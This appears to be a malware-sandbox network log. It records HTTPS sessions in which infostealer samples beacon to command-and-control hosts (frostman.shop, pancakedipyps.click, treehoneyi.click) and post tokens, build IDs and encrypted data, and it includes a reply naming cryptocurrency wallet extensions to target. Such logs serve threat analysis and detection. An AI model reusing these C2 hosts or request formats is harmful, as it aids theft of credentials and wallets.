                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: 10 6c b1 c3 43 9f f0 3f 59 76 af 02 67 b0 54 f7 64 a9 a4 41 7a f1 55 3c 58 14 9b 71 f4 62 1b cc ea f9 ea e7 b3 3e 55 85 f4 b3 bf de 9d 53 4d 6d 9e 35 58 a9 11 f8 1a ef af 04 b4 0d 00 89 83 d5 13 48 bd 3c c5 24 d2 89 05 1c 1f bb d5 f4 dd 7a 94 ce 79 71 8c 97 22 b9 33 18 95 d9 86 64 f2 0f 5e 2c 08 f8 19 ab 28 06 cd 8b 21 d6 67 70 fb f6 ee 4e 7c 83 23 21 0d 22 a9 e2 bc be 00 bc cc fd 8a 0f 5d 12 94 27 30 87 83 86 71 7b a7 8c 9b 88 74 79 88 1e 7a 93 83 8f 1b f6 ee a5 3b cf d0 ef e0 f1 27 60 db 50 08 03 af 0d 1b 14 d0 f3 40 ca ee d4 65 9e db 35 a6 2b 00 73 6c 92 16 d2 d2 28 dd 20 93 c6 ef 4d 32 0d 33 71 93 fc 73 e9 b9 a3 96 0a fd 32 8a a2 db d7 b2 57 db 49 a1 ef f1 55 0b 8f 1f db 76 53 a4 67 88 d3 72 5b b6 db 31 d2 fd ce b3 d6 d5 a9 7e ec 48 a2 7c 33 7e fb 87
                                                                                                                                                                                                                                                                          Data Ascii: lC?YvgTdAzU<Xqb>USMm5XH<$zyq"3d^,(!gpN|#!"]'0q{tyz;'`P@e5+sl( M23qs2WIUvSgr[1~H|3~
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: 1b 93 12 a5 2a 5a fc 79 36 8d 16 88 a6 b7 b9 a1 62 6c 43 b5 71 7c 96 69 1c c4 c7 4d c7 32 c2 2b 0a 60 83 44 d6 45 b3 ac 68 dd a6 88 e2 b9 7a 1d d4 07 45 2b 28 ab 1c a3 4d 4c fe ad c0 c3 cb 8d 85 50 a2 13 0e 85 98 54 f1 68 8a 24 a6 c4 33 90 d1 b9 ee 2e 13 a5 61 cb 77 20 53 75 c3 5c b1 3a 36 2c 90 bd 3c ac 83 0a e3 82 bf 8c 44 56 20 61 d5 b9 61 f1 1d e2 a4 eb a3 99 1b d9 72 43 25 8d dc f4 6d fa 62 d2 03 59 7d c9 9d a9 78 62 da 85 25 7a 31 65 b9 e0 65 6f d5 68 65 0e eb e1 be 73 3b d6 c4 7b 33 23 f6 72 dd 05 7f b2 e3 7f 8c 55 39 9b 85 c7 f3 83 f5 b9 c1 df db 2f 4d 94 29 7f d7 d5 f8 9a 76 3e 72 4d 92 0d 63 fc 3b 45 dc 49 1a ea b4 d3 9c 4b 94 1d fc a8 89 5c 2e 31 f8 a2 5b 3e dd f3 b8 d3 72 d1 49 d4 39 ec eb 4c eb f0 c8 70 91 76 7f e5 fc 9f 53 8d e2 ae ad 79 61
                                                                                                                                                                                                                                                                          Data Ascii: *Zy6blCq|iM2+`DEhzE+(MLPTh$3.aw Su\:6,<DV aarC%mbY}xb%z1eeohes;{3#rU9/M)v>rMc;EIK\.1[>rI9LpvSya
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: cb d1 2c 34 1c 9a 12 36 a3 d0 a0 1f f9 d6 48 37 2e 9c 67 16 6c cd 2c 96 bf 44 31 a7 c4 f6 d2 be 7e c3 5e 91 d6 c2 88 7c 7c 60 5f d8 14 34 af 47 8c 8b e1 a8 55 ea 3b 73 83 c4 a0 45 07 b3 17 e9 da 09 41 ac b4 fe 01 8a d8 f0 cf df 11 bd 65 94 e2 c5 75 ee c3 1a 8d bf b3 f1 78 da 83 e4 a4 7d f2 b1 81 e3 b2 17 c7 78 fa 9a fb 0a 4d 43 44 e7 6c a0 93 03 87 bc 26 05 ce aa 00 94 5f cc ec c2 2f 5f 71 85 d8 7a d1 76 41 ae 43 12 ad ef 53 02 b4 a7 db 33 7c 40 42 59 bc df b6 49 aa f8 c2 b8 57 cd 77 9d 57 f9 f8 5e 2c 38 37 61 e8 11 1f 36 63 fc f5 62 e6 ce f6 1f a1 b6 36 e9 7f d2 a1 09 e8 a5 60 8e e0 82 20 18 3b d5 67 96 63 76 06 0d 2e b4 e4 2c f6 05 31 5d 44 7a 95 8c 4e 47 1b de 0d db 1a 9c d6 5d 3e bd 23 7c 4e ce 49 c3 1f 97 8a b1 c7 e0 5b 82 d2 47 9b b5 29 5a c6 39 66
                                                                                                                                                                                                                                                                          Data Ascii: ,46H7.gl,D1~^||`_4GU;sEAeux}xMCDl&_/_qzvACS3|@BYIWwW^,87a6cb6` ;gcv.,1]DzNG]>#|NI[G)Z9f
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: cf 7f 3d 89 12 e1 5f 07 f6 13 22 bb f0 47 27 b6 74 e6 1e 5a e3 04 49 31 32 a1 84 d8 98 f0 46 a3 88 ee cc 21 7f 48 36 77 6d 13 5e 91 24 e8 b7 9a 7d f7 de 1b f9 23 0a 3c 85 e0 ff d7 fc 21 f1 31 7e 9e 08 ca 47 51 b7 1d df 3e 89 c7 df 97 3c a9 19 f5 47 e0 e1 f9 21 93 de 3e b5 f7 13 d3 e9 93 23 31 da 0f 3a 47 99 94 f8 d7 f0 4d b4 6f ea 40 6b eb 84 15 1e 5e 42 89 8c 89 86 d9 6d 95 ec df b3 b7 5f 6a 8f 44 f6 c2 52 e2 d9 d1 86 d5 74 0d 3f 13 6b 4a 1e 1a c8 3d 15 07 f6 1e b5 0f a8 e4 00 71 70 23 ea e6 ea 49 ec d1 69 b9 4d ea 50 57 ad 02 66 9b 10 8e b2 b0 79 7d b5 f4 00 ee a3 35 de 5e 34 24 c8 16 07 f7 cc 82 12 df 20 38 07 e5 49 41 63 cc cc dd 8b 1a 28 4d ce 8c 1c 90 9a 95 84 be 91 59 59 3a 5a b0 ff f1 25 f8 f8 25 1e 84 73 77 83 a9 0e ad 91 11 3f f4 a1 a7 9e c6 d8
                                                                                                                                                                                                                                                                          Data Ascii: =_"G'tZI12F!H6wm^$}#<!1~GQ><G!>#1:GMo@k^Bm_jDRt?kJ=qp#IiMPWfy}5^4$ 8IAc(MYY:Z%%sw?
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC15331OUTData Raw: fc 67 ae ef 0e 0b f3 46 aa 30 64 ee 1a d1 b2 a6 37 b2 3b b5 8b 25 d1 3a f2 0c 4e d9 15 b4 2e 29 d6 2b c7 58 c9 44 5e c3 d0 33 a3 cc fb a5 25 ae 0f d4 59 a2 f0 6d c6 60 4a 04 3e 5b 7a fc 7c 91 5d 99 84 ef d1 1f f4 2a cf d0 84 bb 90 99 16 fa 29 b9 13 92 0b 2f 97 ed 16 20 73 d3 61 6e aa 14 b5 d6 1f 26 8b af e0 a2 fa 7b 5b 84 dc 6b 9a 99 2b 61 31 77 f6 8f 3c bb b3 0e 85 f7 a6 e1 07 a2 a6 27 73 3d 7c fb 69 56 13 58 f5 cc 79 ad d9 8e af 25 8d 71 e5 71 0b f0 1d 3b 80 a0 fa 64 20 f2 95 98 7c 9d 4c 8d c5 93 8f ce d7 aa 8d ed 04 17 be 21 35 68 80 62 1a 1d 64 aa a7 a4 72 98 78 95 42 2e df 46 2a 0a 6e 67 12 d8 ee 13 e6 6b 34 a3 e0 7f fc b6 72 3b da cf f2 0e 41 50 f7 f1 1d 5b 60 a6 5a 96 f4 ad 6f 31 7e 7d 06 e4 36 6e 73 4d 6a e5 c2 c2 46 02 7b d8 27 b9 9c 3c b8 ea cf
                                                                                                                                                                                                                                                                          Data Ascii: gF0d7;%:N.)+XD^3%Ym`J>[z|]*)/ san&{[k+a1w<'s=|iVXy%qq;d |L!5hbdrxB.F*ngk4r;AP[`Zo1~}6nsMjF{'<
                                                                                                                                                                                                                                                                          2024-12-21 00:15:06 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:06 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=get6asmvaclpd44ngqh4rp5qv8; expires=Tue, 15 Apr 2025 18:01:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXUbrdB037yKpTO6ZaSFjMRbZaDMLXQqSwy1r%2FDmGwyrIgLTjdg40SjIxRgkX%2BvT9Es9nUZsBhBpfTeXjluFbz3Ry3yHGlZpjqNlH%2BpU4Pc8nAY2HMpg9RKbY3EmA32cf3577JT0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ace6d9517ca5-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1887&rtt_var=742&sent=313&recv=578&lost=0&retrans=0&sent_bytes=2849&recv_bytes=554248&delivery_rate=1441263&cwnd=243&unsent_bytes=0&cid=975bebef29846fb6&ts=4756&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          14192.168.2.549966116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:02 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------AAAAAAAAAAAAAAAAAAAACont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:03 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:03 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          15192.168.2.549973116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:05 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----3O8GDBAS0ZU37YUAS0ZM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 7937
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:05 UTC7937OUTData Raw: 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------3O8GDBAS0ZU37YUAS0ZMContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------3O8GDBAS0ZU37YUAS0ZMContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------3O8GDBAS0ZU37YUAS0ZMCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:05 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.549976116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:06 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q90R9HVAI58YU3ECJEKX
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-21 00:15:06 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 34 65 38 36 38 30 38 66 37 34 63 61 31 31 39 66 37 61 36 32 34 33 36 38 34 65 61 62 32 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="token"6644e86808f74ca119f7a6243684eab2------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------Q90R9HVAI58YU3ECJEKXCont
                                                                                                                                                                                                                                                                          2024-12-21 00:15:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:06 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-21 00:15:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.549992104.21.23.764432252C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:08 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 81
                                                                                                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                                                                                                          2024-12-21 00:15:08 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=80E12067200E3E98AC8923850305D13E
                                                                                                                                                                                                                                                                          2024-12-21 00:15:09 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:08 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5o3ijaff9djog6i23u26tfq485; expires=Tue, 15 Apr 2025 18:01:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zd6iC2hCjgEOLsm9QPaJgZFxGrnFYpU1kubske0p7omsTcdX9C1OS0Tp37EzhAuRd1eua8vcq4zKwRwxPCUXTMtbgsjpqA6cwMWBPosVZa%2BQtNPzeOQ9yjOlqmKfGuU87SnFaMl4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ad0eb9b742db-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1759&rtt_var=665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=984&delivery_rate=1640449&cwnd=215&unsent_bytes=0&cid=022662c4701ea7b2&ts=790&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:09 UTC54INData Raw: 33 30 0d 0a 32 48 55 6b 61 43 77 51 42 76 6a 79 6d 75 6e 44 62 74 4e 44 48 52 4c 56 2b 35 67 32 66 7a 52 6d 46 4e 4d 4c 4f 66 35 58 72 48 53 44 4b 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 302HUkaCwQBvjymunDbtNDHRLV+5g2fzRmFNMLOf5XrHSDKA==
                                                                                                                                                                                                                                                                          2024-12-21 00:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.549998172.67.180.1134436716C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:10 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                                          Host: treehoneyi.click
                                                                                                                                                                                                                                                                          2024-12-21 00:15:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                                          2024-12-21 00:15:11 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=eghvj3aboqo9ufv0k6r2be479u; expires=Tue, 15 Apr 2025 18:01:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7Fmdj36W4DnBFd7I%2BwPHgZG9E307bD9d3o0GL%2F7QiK3zlyc4YdhzCJVh169OtRUZW8%2FOVYqvu2KkFLI8LKsVBcO71O1UXOW9Y1IAVAtW1%2BJBap2SzQaKe1olp97xZXeLwcQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ad19891c185d-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1623&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1680092&cwnd=238&unsent_bytes=0&cid=c2ec824d9610ea94&ts=1052&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                                          2024-12-21 00:15:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          19192.168.2.550020116.203.12.1144434952C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:15:14 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----00HVS2NY5XBAAA1NG4OZ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: frostman.shop
                                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
